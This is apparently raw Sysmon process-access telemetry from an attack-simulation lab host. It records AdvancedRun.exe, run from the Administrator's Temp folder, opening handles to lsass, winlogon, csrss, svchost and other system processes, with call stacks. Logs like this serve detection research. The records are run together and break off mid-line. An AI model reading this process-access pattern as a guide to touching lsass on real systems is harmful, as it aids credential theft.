1b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1400-000000002402}1084C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1200-000000002402}400C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.710{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1100-000000002402}416C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1000-000000002402}436C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000002968240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0F00-000000002402}304C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0E00-000000002402}996C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0D00-000000002402}900C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0C00-000000002402}844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0B00-000000002402}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.708{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0A00-000000002402}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.708{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0900-000000002402}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.707{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0800-000000002402}492C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.707{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0700-000000002402}484C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.707{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0500-000000002402}412C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.706{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-0200-000000002402}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 
22:21:53.706{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM3